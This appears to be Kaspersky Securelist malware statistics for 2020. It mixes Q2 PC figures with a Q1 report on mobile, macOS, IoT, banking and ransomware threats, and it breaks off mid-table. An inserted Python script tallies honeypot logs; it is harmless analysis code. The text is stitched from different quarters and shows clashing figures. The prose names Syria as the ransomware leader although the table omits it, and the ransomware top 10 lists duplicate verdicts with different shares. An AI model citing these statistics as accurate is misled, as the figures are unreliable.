_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or on removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._

In Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| Country* | % of attacked users**
---|---|---
1 | Turkmenistan | 48.0224
2 | Uzbekistan | 42.2632
3 | Tajikistan | 42.1279
4 | Ethiopia | 41.7213
5 | Afghanistan | 40.6278
6 | Myanmar | 39.1377
7 | Burkina Faso | 37.4560
8 | Benin | 37.4390
9 | China | 36.7346
10 | Kyrgyzstan | 36.0847
11 | Vietnam | 35.4327
12 | Mauritania | 34.2613
13 | Laos | 34.0350
14 | Mongolia | 33.6261
15 | Burundi | 33.4323
16 | Belarus | 33.0937
17 | Guinea | 33.0097
18 | Mali | 32.9902
19 | Togo | 32.6962
20 | Cameroon | 32.6347

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_

Overall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.

_Source: "IT threat evolution Q2 2020. PC statistics", Securelist, published 2020-09-03, <https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/>_

_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._

## Quarterly figures

According to Kaspersky Security Network,

 * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.
 * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.
 * Ransomware attacks were defeated on the computers of 178,922 unique users.
 * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.
 * Kaspersky products for mobile devices detected:
   * 1,152,662 malicious 
installation packages
   * 42,115 installation packages for mobile banking trojans
   * 4339 installation packages for mobile ransomware trojans

## Mobile threats

### Quarter events

Q1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for €0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but also to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.

Another interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.

The third piece of malware that caught our attention this reporting quarter was Trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the chances of their apps getting published and recommended, and to lull the vigilance of potential victims. 
Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.

### Mobile threat statistics

In Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.

_Number of malicious installation packages detected, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_

Starting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.

### Distribution of detected mobile apps by type

_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_

Of all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).

Potentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.

In third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. 
against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.

It is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.

### Top 20 mobile malware programs

_Note that these malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._

| **Verdict** | **%***
---|---|---
1 | DangerousObject.Multi.Generic | 44.89
2 | Trojan.AndroidOS.Boogr.gsh | 9.09
3 | DangerousObject.AndroidOS.GenericML | 7.08
4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52
5 | Trojan.AndroidOS.Hiddapp.ch | 2.73
6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45
7 | Trojan.AndroidOS.Handda.san | 2.31
8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30
9 | Trojan.AndroidOS.Necro.a | 2.19
10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94
11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82
12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50
13 | Exploit.AndroidOS.Lotoor.be | 1.46
14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46
15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43
16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42
17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39
18 | Trojan.AndroidOS.Dvmap.a | 1.24
19 | Trojan.AndroidOS.Agent.rt | 1.21
20 | Trojan.AndroidOS.Vdloader.a | 1.18

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._

First place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud 
technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). It is triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7.08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

In fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.

Trojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon in the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.

Sixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. 
Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.

The verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place covers a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.

Trojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.

### Geography of mobile threats

_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_

**Top 10 countries by share of users attacked by mobile threats**

| **Country*** | **%****
---|---|---
1 | Iran | 39.56
2 | Algeria | 21.44
3 | Bangladesh | 18.58
4 | Nigeria | 15.58
5 | Lebanon | 15.28
6 | Tunisia | 14.94
7 | Pakistan | 13.99
8 | Kuwait | 13.91
9 | Indonesia | 13.81
10 | Cuba | 13.62

_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._

In Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. 
Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.

### Mobile banking trojans

During the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.

_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_

**Top 10 mobile banking trojans**

| **Verdict** | **%***
---|---|---
1 | Trojan-Banker.AndroidOS.Rotexy.e | 13.11
2 | Trojan-Banker.AndroidOS.Svpeng.q | 10.25
3 | Trojan-Banker.AndroidOS.Asacub.snt | 7.64
4 | Trojan-Banker.AndroidOS.Asacub.ce | 6.31
5 | Trojan-Banker.AndroidOS.Agent.eq | 5.70
6 | Trojan-Banker.AndroidOS.Anubis.san | 4.68
7 | Trojan-Banker.AndroidOS.Agent.ep | 3.65
8 | Trojan-Banker.AndroidOS.Asacub.a | 3.50
9 | Trojan-Banker.AndroidOS.Asacub.ar | 3.00
10 | Trojan-Banker.AndroidOS.Agent.cf | 2.70

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._

First and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).

Third, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. 
The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.

_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_

**Top 10 countries by share of users attacked by mobile banking trojans**

| Country* | %**
---|---|---
1 | Japan | 0.57
2 | Spain | 0.48
3 | Italy | 0.26
4 | Bolivia | 0.18
5 | Russia | 0.17
6 | Turkey | 0.13
7 | Tajikistan | 0.13
8 | Brazil | 0.11
9 | Cuba | 0.11
10 | China | 0.10

_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._
_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._

In Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.

In second place came Spain (0.48%), where in more than half of all cases we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.

Third place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.

It is worth saying a bit more about the Cebruser family. 
Its creators were among the first to exploit the coronavirus topic to spread the malware.

When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.

The malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail — the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. 
In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.

### Mobile ransomware trojans

In Q1 2020, we detected **4,339** installation packages of mobile ransomware trojans, 1,067 fewer than in the previous quarter.

_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_

**Top 10 mobile ransomware trojans**

| Verdict | %*
---|---|---
1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08
2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70
3 | Trojan-Ransom.AndroidOS.Small.as | 11.41
4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88
5 | Trojan-Ransom.AndroidOS.Small.as | 7.32
6 | Trojan-Ransom.AndroidOS.Small.o | 4.79
7 | Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62
8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55
9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32
10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._

Over the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. 
The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.

_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_

**Top 10 countries by share of users attacked by mobile ransomware trojans**

| **Country*** | **%****
---|---|---
1 | USA | 0.26
2 | Kazakhstan | 0.25
3 | Iran | 0.16
4 | China | 0.09
5 | Saudi Arabia | 0.08
6 | Italy | 0.03
7 | Mexico | 0.03
8 | Canada | 0.03
9 | Indonesia | 0.03
10 | Switzerland | 0.03

_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._
_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._

The leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%).

## Attacks on Apple macOS

In Q1 2020, we detected not only new versions of common threats, but also one new backdoor family, whose first member was Backdoor.OSX.Capip.a. 
The malware's operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.

### Top 20 threats to macOS

| Verdict | %*
---|---|---
1 | Trojan-Downloader.OSX.Shlayer.a | 19.27
2 | AdWare.OSX.Pirrit.j | 10.34
3 | AdWare.OSX.Cimpli.k | 6.69
4 | AdWare.OSX.Ketin.h | 6.27
5 | AdWare.OSX.Pirrit.aa | 5.75
6 | AdWare.OSX.Pirrit.o | 5.74
7 | AdWare.OSX.Pirrit.x | 5.18
8 | AdWare.OSX.Spc.a | 4.56
9 | AdWare.OSX.Cimpli.f | 4.25
10 | AdWare.OSX.Bnodlero.t | 4.08
11 | AdWare.OSX.Bnodlero.x | 3.74
12 | Hoax.OSX.SuperClean.gen | 3.71
13 | AdWare.OSX.Cimpli.h | 3.37
14 | AdWare.OSX.Pirrit.v | 3.30
15 | AdWare.OSX.Amc.c | 2.98
16 | AdWare.OSX.MacSearch.d | 2.85
17 | RiskTool.OSX.Spigot.a | 2.84
18 | AdWare.OSX.Pirrit.s | 2.80
19 | AdWare.OSX.Ketin.d | 2.76
20 | AdWare.OSX.Bnodlero.aq | 2.70

_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

The top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular numerous adware apps from the Pirrit family.

Interestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. 
Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation it scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.

### Threat geography

| **Country*** | **%****
---|---|---
1 | Spain | 7.14
2 | France | 6.94
3 | Italy | 5.94
4 | Canada | 5.58
5 | USA | 5.49
6 | Russia | 5.10
7 | India | 4.88
8 | Mexico | 4.78
9 | Brazil | 4.65
10 | Belgium | 4.65

_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)._
_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country._

The leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.

## IoT attacks

### IoT threat statistics

In Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. They accounted for 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%.

**Service** | **%**
---|---
SSH | 18.9%
Telnet | 81.1%

_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_

It was a similar situation with control sessions: attackers often controlled infected traps via telnet.
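The figures in this section are all shares of a total derived from trap telemetry: unique attacking IPs per service, working sessions per service, and (further down) the verdicts of samples dropped after a successful login. The script below is an added example, not Kaspersky's own tooling, that computes those three distributions from constructed log lines in a format assumed for the example.

```python
"""Aggregate honeypot (trap) telemetry into the three distributions reported in
this section: unique attacking IPs per service, working sessions per service,
and the share of each verdict among samples dropped after a successful login.
The log format and every line of SAMPLE_LOG are constructed for this example."""
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Optional

SERVICES = {"telnet", "ssh"}
EVENTS = {"login", "session", "download"}


class TrapEvent(NamedTuple):
    timestamp: str
    service: str
    src_ip: str
    event: str               # login | session | download
    verdict: Optional[str]   # set only for download events


# Constructed sample log (RFC 5737 documentation addresses, not real attackers).
# One event per line: <timestamp> <service> <src_ip> <event> [<verdict>]
SAMPLE_LOG = """\
2020-04-01T00:00:01Z telnet 203.0.113.5 login
2020-04-01T00:00:02Z telnet 203.0.113.5 session
2020-04-01T00:00:03Z telnet 203.0.113.5 download Trojan-Downloader.Linux.NyaDrop.b
2020-04-01T00:01:00Z telnet 198.51.100.7 login
2020-04-01T00:01:01Z ssh 198.51.100.7 login
2020-04-01T00:01:02Z ssh 198.51.100.7 session
2020-04-01T00:01:03Z ssh 198.51.100.7 download Backdoor.Linux.Mirai.b
2020-04-01T00:02:00Z telnet 192.0.2.9 login
2020-04-01T00:02:01Z telnet 192.0.2.9 session
2020-04-01T00:02:02Z telnet 192.0.2.9 download Trojan-Downloader.Linux.NyaDrop.b
2020-04-01T00:03:00Z ssh 192.0.2.10 login
2020-04-01T00:03:01Z ssh 192.0.2.10 session
2020-04-01T00:03:02Z ssh 192.0.2.10 download Backdoor.Linux.Gafgyt.a
2020-04-01T00:04:00Z telnet 203.0.113.44 login
2020-04-01T00:04:05Z telnet 203.0.113.44 login
this line is malformed and must be skipped
"""


def parse_log(text: str) -> List[TrapEvent]:
    """Parse log lines into events, dropping malformed or incomplete ones."""
    events = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[1] not in SERVICES or fields[3] not in EVENTS:
            continue
        verdict = None
        if fields[3] == "download":
            if len(fields) < 5:
                continue  # a download with no verdict cannot be ranked
            verdict = fields[4]
        events.append(TrapEvent(fields[0], fields[1], fields[2], fields[3], verdict))
    return events


def _shares(counts: Counter) -> Dict[str, float]:
    """Convert raw counts into percentages of their total, largest first."""
    total = sum(counts.values())
    if total == 0:
        return {}
    return {key: round(100.0 * n / total, 2) for key, n in counts.most_common()}


def attacking_ip_share(events: List[TrapEvent]) -> Dict[str, float]:
    """Share of unique attacking IPs per service. A device that probes both
    services is counted once under each, so the denominator is the sum of the
    per-service unique counts (the report's 'unique IP addresses' distribution)."""
    ips_by_service = defaultdict(set)
    for ev in events:
        ips_by_service[ev.service].add(ev.src_ip)
    return _shares(Counter({svc: len(ips) for svc, ips in ips_by_service.items()}))


def session_share(events: List[TrapEvent]) -> Dict[str, float]:
    """Share of attacker working sessions per service, i.e. logins that were
    followed by command activity rather than bare password guesses."""
    return _shares(Counter(ev.service for ev in events if ev.event == "session"))


def download_verdict_share(events: List[TrapEvent]) -> Dict[str, float]:
    """Share of each verdict among all samples dropped onto the traps."""
    return _shares(Counter(ev.verdict for ev in events if ev.event == "download"))


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for title, table in (("Attacking IPs by service", attacking_ip_share(evs)),
                         ("Working sessions by service", session_share(evs)),
                         ("Verdicts of downloaded samples", download_verdict_share(evs))):
        print(title)
        for name, pct in table.items():
            print(f"  {name:<40} {pct:6.2f}%")
```

Note that an IP probing both services inflates the first distribution's denominator by design, which is why the per-service percentages of unique IPs and of sessions can differ markedly, as they do in the report.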
**Service** | **%**
---|---
SSH | 39.62%
Telnet | 60.38%

_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_

### Telnet-based attacks

_Geography of device IP addresses from which attacks on Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_

**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps**

**Country** | **%**
---|---
China | 13.04
Egypt | 11.65
Brazil | 11.33
Vietnam | 7.38
Taiwan | 6.18
Russia | 4.38
Iran | 3.96
India | 3.14
Turkey | 3.00
USA | 2.57

For several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).

### SSH-based attacks

_Geography of device IP addresses from which attacks on Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_

**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**

**Country** | **%**
---|---
China | 14.87
Vietnam | 11.58
USA | 7.03
Egypt | 6.82
Brazil | 5.79
Russia | 4.66
India | 4.16
Germany | 3.64
Thailand | 3.44
France | 2.83

In Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.

### Threats loaded into honeypots

**Verdict** | **%***
---|---
Trojan-Downloader.Linux.NyaDrop.b | 64.35
Backdoor.Linux.Mirai.b | 16.75
Backdoor.Linux.Mirai.ba | 6.47
Backdoor.Linux.Gafgyt.a | 4.36
Backdoor.Linux.Gafgyt.bj | 1.30
Trojan-Downloader.Shell.Agent.p | 0.68
Backdoor.Linux.Mirai.c | 0.64
Backdoor.Linux.Hajime.b | 0.46
Backdoor.Linux.Mirai.h | 0.40
Backdoor.Linux.Gafgyt.av | 0.35

_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._

In Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.

## Financial threats

### Financial threat statistics

In Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.

_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_

**Attack geography**

To assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_

**Top 10 countries by share of attacked users**

| **Country*** | **%****
---|---|---
1 | Uzbekistan | 10.5
2 | Tajikistan | 6.9
3 | Turkmenistan | 5.5
4 | Afghanistan | 5.1
5 | Yemen | 3.1
6 | Kazakhstan | 3.0
7 | Guatemala | 2.8
8 | Syria | 2.4
9 | Sudan | 2.1
10 | Kyrgyzstan | 2.1

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._
_** Unique users whose computers were targeted by financial malware as a 
percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Emotet | Backdoor.Win32.Emotet | 21.3 \n2 | Zbot | Trojan.Win32.Zbot | 20.8 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 \n4 | RTM | Trojan-Banker.Win32.RTM | 12.3 \n5 | Nimnul | Virus.Win32.Nimnul | 3.6 \n6 | Trickster | Trojan.Win32.Trickster | 3.6 \n7 | Neurevt | Trojan.Win32.Neurevt | 3.3 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 \n10 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n \n_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly highlights\n\nRansomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.\n\nMore and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. 
Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.\n\n### Number of new modifications\n\nIn Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.\n\n_Number of new ransomware modifications detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_\n\n### Number of users attacked by ransomware trojans\n\nIn Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_\n\n### Attack geography\n\n_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_\n\n**Top 10 countries attacked by ransomware trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 6.64 \n2 | Uzbekistan | 1.98 \n3 | Mozambique | 1.77 \n4 | Ethiopia | 1.67 \n5 | Nepal | 1.34 \n6 | Afghanistan | 1.31 \n7 | Egypt | 1.21 \n8 | Ghana | 0.83 \n9 | Azerbaijan | 0.81 \n10 | Serbia | 0.74 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 \n4 | 
